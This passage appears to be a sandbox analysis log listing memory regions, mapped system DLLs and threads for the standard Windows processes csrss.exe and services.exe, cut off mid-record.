1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000930000" filename = "" Thread: id = 239 os_tid = 0x13c Thread: id = 240 os_tid = 0x144 Thread: id = 241 os_tid = 0x148 Thread: id = 242 os_tid = 0x14c Thread: id = 243 os_tid = 0x150 Thread: id = 244 os_tid = 0x170 Thread: id = 252 os_tid = 0x1a8 Thread: id = 254 os_tid = 0x1b0 Thread: id = 256 os_tid = 0x1dc Process: id = "6" image_name = "csrss.exe" filename = "c:\\windows\\system32\\csrss.exe" page_root = "0x16344000" os_pid = "0x168" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0x154" cmd_line = "%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 1717 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1718 start_va = 0x130000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 1719 start_va = 0x49d50000 end_va = 0x49d55fff monitored = 0 entry_point = 0x49d51540 region_type = mapped_file name = "csrss.exe" filename = "\\Windows\\System32\\csrss.exe" (normalized: "c:\\windows\\system32\\csrss.exe") Region: id = 1720 start_va = 0x77970000 end_va = 0x77b18fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1721 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1722 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1723 start_va = 0x7feffc90000 end_va = 0x7feffc90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1724 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1725 start_va = 0x7fffffdd000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 1726 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 1727 start_va = 0x210000 end_va = 0x30ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1728 start_va = 0x7fefd940000 end_va = 0x7fefd952fff monitored = 0 entry_point = 0x7fefd947c30 region_type = mapped_file name = "csrsrv.dll" filename = "\\Windows\\System32\\csrsrv.dll" (normalized: "c:\\windows\\system32\\csrsrv.dll") Region: id = 1729 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1730 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1731 start_va = 0x7fefd920000 end_va = 0x7fefd930fff monitored = 0 entry_point = 0x7fefd92b1ec region_type = mapped_file name = "basesrv.dll" filename = "\\Windows\\System32\\basesrv.dll" (normalized: "c:\\windows\\system32\\basesrv.dll") Region: id = 1732 start_va = 0x10000 end_va = 0x10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1733 start_va = 0x10000 end_va = 0x10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1734 start_va = 0x7fefd8e0000 end_va = 0x7fefd917fff monitored = 0 entry_point = 0x7fefd8e27c0 region_type = mapped_file name = "winsrv.dll" filename = "\\Windows\\System32\\winsrv.dll" (normalized: "c:\\windows\\system32\\winsrv.dll") Region: id = 1735 start_va = 0x77870000 end_va = 0x77969fff monitored = 0 entry_point = 0x7788a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1736 start_va = 0x7feff010000 end_va = 0x7feff076fff monitored = 0 entry_point = 0x7feff01b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1737 start_va = 0x77750000 end_va = 0x7786efff monitored = 0 entry_point = 0x77765340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1738 start_va = 0x7fefd9d0000 end_va = 0x7fefda3bfff monitored = 0 entry_point = 0x7fefd9d2780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1739 start_va = 0x7feff080000 end_va = 0x7feff08dfff monitored = 0 entry_point = 0x7feff081080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1740 start_va = 0x7fefdc90000 end_va = 0x7fefdd58fff monitored = 0 entry_point = 0x7fefdd0a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1741 start_va = 0x7feff500000 end_va = 0x7feff59efff monitored = 0 entry_point = 0x7feff5025a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1742 start_va = 0x10000 end_va = 0x76fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1743 start_va = 0x310000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 1744 start_va = 0x310000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 1745 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 1746 start_va = 0x4f0000 end_va = 0x670fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 1747 start_va = 0x80000 end_va = 0x80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "csrss.exe.mui" filename = "\\Windows\\System32\\en-US\\csrss.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\csrss.exe.mui") Region: id = 1748 start_va = 0x90000 end_va = 0x91fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winsrv.dll.mui" filename = "\\Windows\\System32\\en-US\\winsrv.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winsrv.dll.mui") Region: id = 1754 start_va = 0xa0000 end_va = 0xa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1755 start_va = 0xb0000 end_va = 0xb1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vgasys.fon" filename = "\\Windows\\Fonts\\vgasys.fon" (normalized: "c:\\windows\\fonts\\vgasys.fon") Region: id = 1756 start_va = 0xc0000 end_va = 0xfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 1757 start_va = 0x750000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 1758 start_va = 0x7fefd8d0000 end_va = 0x7fefd8dbfff monitored = 0 entry_point = 0x7fefd8d3e50 region_type = mapped_file name = "sxssrv.dll" filename = "\\Windows\\System32\\sxssrv.dll" (normalized: "c:\\windows\\system32\\sxssrv.dll") Region: id = 1759 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 1760 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 1761 start_va = 0x6b0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 1762 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 1763 start_va = 0x7d0000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 1764 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 1765 start_va = 0x100000 end_va = 0x100fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1766 start_va = 0x110000 end_va = 0x11ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 1767 start_va = 0x180000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 1768 start_va = 0x810000 end_va = 0x997fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 2224 start_va = 0x120000 end_va = 0x126fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "marlett.ttf" filename = "\\Windows\\Fonts\\marlett.ttf" (normalized: "c:\\windows\\fonts\\marlett.ttf") Region: id = 2225 start_va = 0x130000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 2226 start_va = 0x160000 end_va = 0x177fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 2227 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 2228 start_va = 0x410000 end_va = 0x48efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf") Region: id = 2229 start_va = 0x790000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 2230 start_va = 0xa00000 end_va = 0xa3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 2231 start_va = 0xa40000 end_va = 0x1e3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a40000" filename = "" Region: id = 2232 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 2233 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 2234 start_va = 0x7fefd7c0000 end_va = 0x7fefd850fff monitored = 0 entry_point = 0x7fefd7c1440 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 2235 start_va = 0x7feff6c0000 end_va = 0x7feff7ecfff monitored = 0 entry_point = 0x7feff70ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2236 start_va = 0x7fefd7b0000 end_va = 0x7fefd7befff monitored = 0 entry_point = 0x7fefd7b1010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2237 start_va = 0x1d0000 end_va = 0x1d3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2249 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2251 start_va = 0x1d0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2252 start_va = 0x1e0000 end_va = 0x1e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2290 start_va = 0x1e0000 end_va = 0x1e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2295 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 2298 start_va = 0x1f0000 end_va = 0x1f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 2477 start_va = 0x1e0000 end_va = 0x1e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2493 start_va = 0x1e0000 end_va = 0x1e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2505 start_va = 0x1e0000 end_va = 0x1e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2610 start_va = 0x1e0000 end_va = 0x1e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2615 start_va = 0x1e0000 end_va = 0x1e2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 3428 start_va = 0x1e40000 end_va = 0x1edffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "micross.ttf" filename = "\\Windows\\Fonts\\micross.ttf" (normalized: "c:\\windows\\fonts\\micross.ttf") Region: id = 3429 start_va = 0x80000 end_va = 0x81fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winsrv.dll.mui" filename = "\\Windows\\System32\\en-US\\winsrv.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winsrv.dll.mui") Region: id = 4862 start_va = 0x90000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 4863 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 4875 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 4992 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 4993 start_va = 0x1f0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 4994 start_va = 0x200000 end_va = 0x201fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 5040 start_va = 0x200000 end_va = 0x20ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 5041 start_va = 0x490000 end_va = 0x491fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 5042 start_va = 0x9b0000 end_va = 0x9effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 5043 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 5076 start_va = 0x490000 end_va = 0x492fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 5102 start_va = 0x490000 end_va = 0x491fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Thread: id = 245 os_tid = 0x16c Thread: id = 246 os_tid = 0x174 Thread: id = 247 os_tid = 0x178 Thread: id = 248 os_tid = 0x17c Thread: id = 249 os_tid = 0x180 Thread: id = 250 os_tid = 0x18c Thread: id = 251 os_tid = 0x1a4 Thread: id = 253 os_tid = 0x1ac Thread: id = 556 os_tid = 0x718 Process: id = "7" image_name = "services.exe" filename = "c:\\windows\\system32\\services.exe" page_root = "0x12f7e000" os_pid = "0x1c0" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0x15c" cmd_line = "C:\\Windows\\system32\\services.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 1769 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1770 start_va = 0x150000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1771 start_va = 0x77970000 end_va = 0x77b18fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1772 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1773 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1774 start_va = 0xffaf0000 end_va = 0xffb42fff monitored = 0 entry_point = 0xffb03310 region_type = mapped_file name = "services.exe" filename = "\\Windows\\System32\\services.exe" (normalized: "c:\\windows\\system32\\services.exe") Region: id = 1775 start_va = 0x7feffc90000 end_va = 0x7feffc90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1776 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1777 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 1778 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 1792 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1794 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1821 start_va = 0x1f0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1822 start_va = 0x77750000 end_va = 0x7786efff monitored = 0 entry_point = 0x77765340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1823 start_va = 0x7fefd9d0000 end_va = 0x7fefda3bfff monitored = 0 entry_point = 0x7fefd9d2780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1824 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1825 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1826 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1827 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1828 start_va = 0x7feff500000 end_va = 0x7feff59efff monitored = 0 entry_point = 0x7feff5025a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1829 start_va = 0x7feff6c0000 end_va = 0x7feff7ecfff monitored = 0 entry_point = 0x7feff70ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1830 start_va = 0x7fefd780000 end_va = 0x7fefd7a4fff monitored = 0 entry_point = 0x7fefd789658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1831 start_va = 0x7fefd8c0000 end_va = 0x7fefd8cefff monitored = 0 entry_point = 0x7fefd8c19b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1832 start_va = 0x7feff7f0000 end_va = 0x7feff80efff monitored = 0 entry_point = 0x7feff7f60e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1833 start_va = 0x7fefd7b0000 end_va = 0x7fefd7befff monitored = 0 entry_point = 0x7fefd7b1010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1834 start_va = 0x2f0000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 1835 start_va = 0x2f0000 end_va = 0x3effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 1836 start_va = 0x490000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 1837 start_va = 0x7fefd470000 end_va = 0x7fefd488fff monitored = 0 entry_point = 0x7fefd471020 region_type = mapped_file name = "scext.dll" filename = "\\Windows\\System32\\scext.dll" (normalized: "c:\\windows\\system32\\scext.dll") Region: id = 1838 start_va = 0x77870000 end_va = 0x77969fff monitored = 0 entry_point = 0x7788a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1839 start_va = 0x7feff010000 end_va = 0x7feff076fff monitored = 0 entry_point = 0x7feff01b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1840 start_va = 0x7feff080000 end_va = 0x7feff08dfff monitored = 0 entry_point = 0x7feff081080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1841 start_va = 0x7fefdc90000 end_va = 0x7fefdd58fff monitored = 0 entry_point = 0x7fefdd0a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1842 start_va = 0x7fefd460000 end_va = 0x7fefd46afff monitored = 0 entry_point = 0x7fefd461030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1843 start_va = 0x7fefd3b0000 end_va = 0x7fefd416fff monitored = 0 entry_point = 0x7fefd3b1010 region_type = mapped_file name = "scesrv.dll" filename = "\\Windows\\System32\\scesrv.dll" (normalized: "c:\\windows\\system32\\scesrv.dll") Region: id = 1844 start_va = 0x7fefd290000 end_va = 0x7fefd2b2fff monitored = 0 entry_point = 0x7fefd291198 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1845 start_va = 0xc0000 end_va = 0xe8fff monitored = 0 entry_point = 0xc1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1846 start_va = 0x4a0000 end_va = 0x627fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 1847 start_va = 0xc0000 end_va = 0xe8fff monitored = 0 entry_point = 0xc1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1848 start_va = 0x7feff090000 end_va = 0x7feff0bdfff monitored = 0 entry_point = 0x7feff091010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1849 start_va = 0x7feff950000 end_va = 0x7feffa58fff monitored = 0 entry_point = 0x7feff951064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1850 start_va = 0x630000 end_va = 0x7b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 1851 start_va = 0x7c0000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 1852 start_va = 0x20000 end_va = 0x24fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "services.exe.mui" filename = "\\Windows\\System32\\en-US\\services.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\services.exe.mui") Region: id = 1853 start_va = 0xc0000 end_va = 0xc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 1854 start_va = 0xd0000 end_va = 0xd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 1855 start_va = 0x880000 end_va = 0x9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 1856 start_va = 0x8d0000 end_va = 0x94ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 1857 start_va = 0x980000 end_va = 0x9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 1858 start_va = 0xa50000 end_va = 0xacffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 1859 start_va = 0x7fefd860000 end_va = 0x7fefd873fff monitored = 0 entry_point = 0x7fefd8610e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1860 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 1861 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 1862 start_va = 0x7fefd1b0000 end_va = 0x7fefd1c7fff monitored = 0 entry_point = 0x7fefd1b3b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1863 start_va = 0x7fefcd80000 end_va = 0x7fefcd89fff monitored = 0 entry_point = 0x7fefcd83cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 1864 start_va = 0x7fefd420000 end_va = 0x7fefd44efff monitored = 0 entry_point = 0x7fefd421064 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 1865 start_va = 0xe0000 end_va = 0xe6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1866 start_va = 0x7fefcd40000 end_va = 0x7fefcd78fff monitored = 0 entry_point = 0x7fefcd4c0f0 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: 